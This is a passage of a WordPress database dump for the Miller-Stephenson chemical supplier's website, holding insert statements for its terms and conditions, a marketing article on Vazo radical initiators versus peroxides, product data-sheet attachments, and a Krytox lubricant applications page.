Terms and Conditions, “Your Content” shall mean any audio, video text, images or other material you choose to display on this Website. By displaying Your Content, you grant Miller Stephenson, Inc a non-exclusive, worldwide irrevocable, sub licensable license to use, reproduce, adapt, publish, translate and distribute it in any and all media.</p><p>Your Content must be your own and must not be invading any third-party’s rights. Miller Stephenson, Inc reserves the right to remove any of Your Content from this Website at any time without notice.</p><ol start="5"><li><strong>No warranties</strong></li></ol><p>This Website is provided “as is,” with all faults, and Miller Stephenson, Inc express no representations or warranties, of any kind related to this Website or the materials contained on this Website. Also, nothing contained on this Website shall be interpreted as advising you.</p><ol start="6"><li><strong>Limitation of liability</strong></li></ol><p>In no event shall Miller Stephenson, Inc, nor any of its officers, directors and employees, shall be held liable for anything arising out of or in any way connected with your use of this Website whether such liability is under contract. &nbsp;Miller Stephenson, Inc, including its officers, directors and employees shall not be held liable for any indirect, consequential or special liability arising out of or in any way related to your use of this Website.</p><ol start="7"><li><strong>Indemnification</strong></li></ol><p>You hereby indemnify to the fullest extent Miller Stephenson, Inc from and against any and/or all liabilities, costs, demands, causes of action, damages and expenses arising in any way related to your breach of any of the provisions of these Terms.</p><ol start="8"><li><strong>Severability</strong></li></ol><p>If any provision of these Terms is found to be invalid under any applicable law, such provisions shall be deleted without affecting the remaining provisions herein.</p><ol start="9"><li><strong>Variation of Terms</strong></li></ol><p>Miller Stephenson, Inc is permitted to revise these Terms at any time as it sees fit, and by using this Website you are expected to review these Terms on a regular basis.</p><ol start="10"><li><strong>Assignment</strong></li></ol><p>The Miller Stephenson, Inc is allowed to assign, transfer, and subcontract its rights and/or obligations under these Terms without any notification. However, you are not allowed to assign, transfer, or subcontract any of your rights and/or obligations under these Terms.</p><ol start="11"><li><strong>Entire Agreement</strong></li></ol><p>These Terms constitute the entire agreement between Miller Stephenson, Inc and you in relation to your use of this Website, and supersede all prior agreements and understandings.</p><ol start="12"><li><strong>Governing Law &amp; Jurisdiction</strong></li></ol><p>These Terms will be governed by and interpreted in accordance with the laws of the State of CT, and you submit to the non-exclusive jurisdiction of the state and federal courts located in CT for the resolution of any disputes.</p><p></p>', 'Terms & Conditions', '', 'inherit', 'closed', 'closed', '', '2150-revision-v1', '', '', '2016-09-29 16:29:39', '2016-09-29 16:29:39', '', 2150, 'https://www.miller-stephenson.com/2150-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2157, 0, '2016-09-29 16:32:53', '2016-09-29 16:32:53', '', '', '', 'publish', 'closed', 'closed', '', '2157', '', '', '2016-09-29 16:32:53', '2016-09-29 16:32:53', '', 0, 'https://www.miller-stephenson.com/nf_sub/2157/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2158, 2, '2016-10-06 02:01:48', '2016-10-06 02:01:48', 'Vazo™ FRS is a Miller-Stephenson exclusive product line of diazo-compounds designed to be used as radical initiators for a variety of polymerization, halogenations, addition, and crosslinking reactions.  Diazo-compounds decompose via photolysis or thermally to yield two free radicals per molecule and one equivalent of nitrogen gas.\n\n[caption id="attachment_1602" align="aligncenter" width="604"]<img class="wp-image-1602" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/Initiation_-_photolysis-800x114.png" alt="initiation_-_photolysis" width="604" height="86" /> Diagram 1: Photolysis of VAZO 64 (AIBN)[/caption]\n\nThe thermal decomposition temperature at which diazo-compounds will begin this process is dictated by the aliphatic chain and stability of the resultant nitrile-radical. VazoFRS compounds which have a low thermal decomposition temperature will be more reactive and generate more free radicals at a given temperature than a variant with a higher thermal decomposition threshold.  For the compounds, Vazo 64 (AIBN) has a 10hr half-life at 64 degrees Celsius, while Vazo 88 has a 10hr half-life at 88 degrees Celsius and so on.  To ease our customers to distinguish which Vazo variant will work for their synthetic pathway, the number associated each Vazo analogue indicates its 10hr half-life at that temperature.\n\nAnother widely used radical initiator are peroxides.  Peroxides can come as liquid or solid, depending on their chemical structure and, like diazo-compounds, will undergo thermal or light-induced decomposition to generate free radicals.  Peroxides are widely used for a variety of polymerization reactions, however they also have significant chemical and safety drawbacks, in comparison to Vazo. Peroxides are extremely shock sensitive and can detonate on impact, they also can induce free radical decomposition, and are extremely temperature sensitive.  In comparison to the equivalent peroxide (based on similar half-lives) initiator, Vazo does not exhibit any of these dangerous safety concerns.  From a synthetic perspective, peroxides facilitate higher polydispersion, increased crosslinking and branching, higher viscosity, increased by-product formation, lower control on monomer distribution and high oxidation potential versus the equivalent Vazo initiator.  Moreover peroxides are extremely sensitive to heavy metal contamination, pH variation, additives, and solvent choice.  Vazo initiators experience non of these drawbacks, and maintains predictable reactivity independent of solvent choice, pH, contamination, and pigments.  Also, unlike peroxides, FRS initiators are only mild oxidizing so polymerizations with oxidation-susceptible functionality can be performed.\n\nOf interest to any chemical engineer is the cost effectiveness of each reagent chosen for their process. In addition to polymerization control benefits, many Vazo FRS grades have low molecular weights.  On a cost per mol (e.g. cost per pound) basis, Vazo FRS are frequently <b>more </b><b>cost effective </b>than conventional organic peroxides.  Moreover variants come as safer, low-dust "noodle" forms. Vazo noodles present <b>minimal risk of dust blow back </b>during product addition, and are <b>easier </b><b>to handle </b>than typical granular products.\n\nFrom a reactivity, efficiency, cost-effectiveness, and most importantly safety aspect Vazo FRS is a clear improvement to any chemical process currently using peroxide-based initiators or engineers looking to use a safer and higher purity diazo-compound.\n\nTo learn more about Radical Polymerization please go to: <a href="https://en.wikipedia.org/wiki/Radical_polymerization">https://en.wikipedia.org/wiki/Radical_polymerization</a>', 'Vazo Free Radical Initiator: Benefits and Uses', '', 'inherit', 'closed', 'closed', '', '1601-autosave-v1', '', '', '2016-10-06 02:01:48', '2016-10-06 02:01:48', '', 1601, 'https://www.miller-stephenson.com/1601-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2159, 2, '2016-09-29 17:39:06', '2016-09-29 17:39:06', 'Vazo FRS is a Miller-Stephenson exclusive product line of diazo-compounds designed to be used as radical initiators for a variety of polymerization, halogenations, addition, and crosslinking reactions.  Diazo-compounds decompose via photolysis or thermally to yield two free radicals per molecule and one equivalent of nitrogen gas.\r\n\r\n[caption id="attachment_1602" align="aligncenter" width="604"]<img class="wp-image-1602" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/Initiation_-_photolysis-800x114.png" alt="initiation_-_photolysis" width="604" height="86" /> Diagram 1: Photolysis of VAZO 64 (AIBN)[/caption]\r\n\r\nThe thermal decomposition temperature at which diazo-compounds will begin this process is dictated by the aliphatic chain and stability of the resultant nitrile-radical. Vazo compounds which have a low thermal decomposition temperature will be more reactive and generate more free radicals at a given temperature than a variant with a higher thermal decomposition threshold.  For the Vazo compounds, Vazo 64 (AIBN) has a 10hr half-life at 64 degrees Celsius, while Vazo 88 has a 10hr half-life at 88 degrees Celsius and so on.  To ease our customers to distinguish which Vazo variant will work for their synthetic pathway, the number associated each Vazo analogue indicates its 10hr half-life at that temperature.\r\n\r\nAnother widely used radical initiator are peroxides.  Peroxides can come as liquid or solid, depending on their chemical structure and, like diazo-compounds, will undergo thermal or light-induced decomposition to generate free radicals.  Peroxides are widely used for a variety of polymerization reactions, however they also have significant chemical and safety drawbacks, in comparison to Vazo FRS. Peroxides are extremely shock sensitive and can detonate on impact, they also can induce free radical decomposition, and are extremely temperature sensitive.  In comparison to the equivalent peroxide (based on similar half-lives) initiator, Vazo does not exhibit any of these dangerous safety concerns.  From a synthetic perspective, peroxides facilitate higher polydispersion, increased crosslinking and branching, higher viscosity, increased by-product formation, lower control on monomer distribution and high oxidation potential versus the equivalent Vazo initiator.  Moreover peroxides are extremely sensitive to heavy metal contamination, pH variation, additives, and solvent choice.  Vazo initiators experience non of these drawbacks, and maintains predictable reactivity independent of solvent choice, pH, contamination, and pigments.  Also, unlike peroxides, Vazo initiators are only mild oxidizing so polymerizations with oxidation-susceptible functionality can be performed.\r\n\r\nOf interest to any chemical engineer is the cost effectiveness of each reagent chosen for their process. In addition to polymerization control benefits, many Vazo FRS grades have low molecular weights.  On a cost per mol (e.g. cost per pound) basis, Vazo FRS are frequently <b>more </b><b>cost effective </b>than conventional organic peroxides.  Moreover Vazo variants come as safer, low-dust "noodle" forms. Vazo noodles present <b>minimal risk of dust blow back </b>during product addition, and are <b>easier </b><b>to handle </b>than typical granular products.\r\n\r\nFrom a reactivity, efficiency, cost-effectiveness, and most importantly safety aspect Vazo FRS is a clear improvement to any chemical process currently using peroxide-based initiators or engineers looking to use a safer and higher purity diazo-compound.\r\n\r\nTo learn more about Radical Polymerization please go to: <a href="https://en.wikipedia.org/wiki/Radical_polymerization">https://en.wikipedia.org/wiki/Radical_polymerization</a>', 'Vazo Free Radical Initiator: Benefits and Uses', '', 'inherit', 'closed', 'closed', '', '1601-revision-v1', '', '', '2016-09-29 17:39:06', '2016-09-29 17:39:06', '', 1601, 'https://www.miller-stephenson.com/1601-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2160, 2, '2016-09-29 18:12:22', '2016-09-29 18:12:22', '', 'ms-122se', '', 'inherit', 'closed', 'closed', '', 'ms-122se-3', '', '', '2016-09-29 18:12:22', '2016-09-29 18:12:22', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-122SE.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2161, 2, '2016-09-29 18:12:23', '2016-09-29 18:12:23', '', 'ms-122xd', '', 'inherit', 'closed', 'closed', '', 'ms-122xd-3', '', '', '2016-09-29 18:12:23', '2016-09-29 18:12:23', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-122XD.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2162, 2, '2016-09-29 18:12:25', '2016-09-29 18:12:25', '', 'ms-143te', '', 'inherit', 'closed', 'closed', '', 'ms-143te-4', '', '', '2016-09-29 18:12:25', '2016-09-29 18:12:25', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-143TE.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2163, 2, '2016-09-29 18:12:26', '2016-09-29 18:12:26', '', 'ms-143xd', '', 'inherit', 'closed', 'closed', '', 'ms-143xd-4', '', '', '2016-09-29 18:12:26', '2016-09-29 18:12:26', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-143XD.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2164, 2, '2016-09-29 18:12:27', '2016-09-29 18:12:27', '', 'ms-242n', '', 'inherit', 'closed', 'closed', '', 'ms-242n', '', '', '2016-09-29 18:12:27', '2016-09-29 18:12:27', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-242N.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2165, 2, '2016-09-29 18:12:28', '2016-09-29 18:12:28', '', 'ms-381h', '', 'inherit', 'closed', 'closed', '', 'ms-381h-2', '', '', '2016-09-29 18:12:28', '2016-09-29 18:12:28', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-381H.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2166, 2, '2016-09-29 18:12:30', '2016-09-29 18:12:30', '', 'ms-381hc-383h', '', 'inherit', 'closed', 'closed', '', 'ms-381hc-383h', '', '', '2016-09-29 18:12:30', '2016-09-29 18:12:30', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-381HC-383H.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2167, 2, '2016-09-29 18:12:31', '2016-09-29 18:12:31', '', 'ms-452n', '', 'inherit', 'closed', 'closed', '', 'ms-452n-3', '', '', '2016-09-29 18:12:31', '2016-09-29 18:12:31', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-452N.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2168, 2, '2016-09-29 18:12:32', '2016-09-29 18:12:32', '', 'ms-460h_462h', '', 'inherit', 'closed', 'closed', '', 'ms-460h_462h-2', '', '', '2016-09-29 18:12:32', '2016-09-29 18:12:32', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-460H_462H.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2169, 2, '2016-09-29 18:12:35', '2016-09-29 18:12:35', '', 'ms-465c_467c', '', 'inherit', 'closed', 'closed', '', 'ms-465c_467c-2', '', '', '2016-09-29 18:12:35', '2016-09-29 18:12:35', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-465C_467C.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2170, 2, '2016-09-29 18:12:37', '2016-09-29 18:12:37', '', 'ms-470c_472c', '', 'inherit', 'closed', 'closed', '', 'ms-470c_472c-2', '', '', '2016-09-29 18:12:37', '2016-09-29 18:12:37', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-470C_472C.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2171, 2, '2016-09-29 18:12:39', '2016-09-29 18:12:39', '', 'ms-470s_472s', '', 'inherit', 'closed', 'closed', '', 'ms-470s_472s-2', '', '', '2016-09-29 18:12:39', '2016-09-29 18:12:39', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-470S_472S.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2172, 2, '2016-09-29 18:12:41', '2016-09-29 18:12:41', '', 'ms-475c_477c', '', 'inherit', 'closed', 'closed', '', 'ms-475c_477c-2', '', '', '2016-09-29 18:12:41', '2016-09-29 18:12:41', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-475C_477C.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2173, 2, '2016-09-29 18:12:43', '2016-09-29 18:12:43', '', 'ms-530n_532n', '', 'inherit', 'closed', 'closed', '', 'ms-530n_532n', '', '', '2016-09-29 18:12:43', '2016-09-29 18:12:43', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-530N_532N.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2174, 2, '2016-09-29 18:12:45', '2016-09-29 18:12:45', '', 'ms-538n_539n', '', 'inherit', 'closed', 'closed', '', 'ms-538n_539n', '', '', '2016-09-29 18:12:45', '2016-09-29 18:12:45', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-538N_539N.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2175, 2, '2016-09-29 18:12:47', '2016-09-29 18:12:47', '', 'ms-550n-552n', '', 'inherit', 'closed', 'closed', '', 'ms-550n-552n', '', '', '2016-09-29 18:12:47', '2016-09-29 18:12:47', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-550N-552N.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2176, 2, '2016-09-29 18:12:49', '2016-09-29 18:12:49', '', 'ms-580n-582n', '', 'inherit', 'closed', 'closed', '', 'ms-580n-582n', '', '', '2016-09-29 18:12:49', '2016-09-29 18:12:49', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-580N-582N.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2177, 2, '2016-09-29 18:12:51', '2016-09-29 18:12:51', '', 'ms-755_757', '', 'inherit', 'closed', 'closed', '', 'ms-755_757', '', '', '2016-09-29 18:12:51', '2016-09-29 18:12:51', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-755_757.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2178, 2, '2016-09-29 18:12:53', '2016-09-29 18:12:53', '', 'g0831b', '', 'inherit', 'closed', 'closed', '', 'g0831b-2', '', '', '2016-09-29 18:12:53', '2016-09-29 18:12:53', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/G0831B.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2179, 2, '2016-09-29 18:12:55', '2016-09-29 18:12:55', '', 'ms-110xn', '', 'inherit', 'closed', 'closed', '', 'ms-110xn', '', '', '2016-09-29 18:12:55', '2016-09-29 18:12:55', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-110XN.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2180, 2, '2016-09-29 18:12:57', '2016-09-29 18:12:57', '', 'ms-114c', '', 'inherit', 'closed', 'closed', '', 'ms-114c-4', '', '', '2016-09-29 18:12:57', '2016-09-29 18:12:57', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-114C.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2181, 2, '2016-09-29 18:12:59', '2016-09-29 18:12:59', '', 'ms-122ad', '', 'inherit', 'closed', 'closed', '', 'ms-122ad-3', '', '', '2016-09-29 18:12:59', '2016-09-29 18:12:59', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-122AD.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2182, 2, '2016-09-29 18:13:01', '2016-09-29 18:13:01', '', 'ms-122av', '', 'inherit', 'closed', 'closed', '', 'ms-122av-3', '', '', '2016-09-29 18:13:01', '2016-09-29 18:13:01', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-122AV.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2183, 2, '2016-09-29 18:17:53', '2016-09-29 18:17:53', '[row col_style="dashed"]\r\n\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#aerospace">Aerospace, Aviation, and National Defense</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#automotive">Automotive - Squeak &amp; Rattle</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Mechanical Systems</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Box Board Corrugating</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Chemical and Petrochemical</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Electronics / Semiconductor</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Food Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Medical Industry</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Metal Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Oxygen &amp; Reactive Gas Service</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Power Generation</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Pulp &amp; Paper</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Textile</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Tire Mold</a>\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n<span style="font-size: 130%;"><strong>Krytox Lubricants Industries and Applications</strong></span>\r\n\r\n<a name="aerospace"></a>\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purpose formulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing</li>\r\n 	<li>Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space</li>\r\n 	<li>Excellent frictional properties for long wear and low energy consumption</li>\r\n 	<li>Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n<a name="automotive"></a>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather on leather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided state of-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh under hood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Under hood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, anti lock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n[ux_product_categories ids="36,38,34" number="10"]\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n[ux_product_categories ids="46,96" number="10"]\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n</ul>\r\nMultipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:\r\n<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n[ux_product_categories ids="156,46,96" number="10"]\r\n\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n[ux_product_categories ids="96,46,38,97" number="10"]\r\n\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry</li>\r\n 	<li>H-1 food grade oils and greases available Krytox works in a variety of applications:</li>\r\n 	<li>Oxygen systems and respirators</li>\r\n 	<li>Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n[ux_product_categories ids="40,115,116,123" 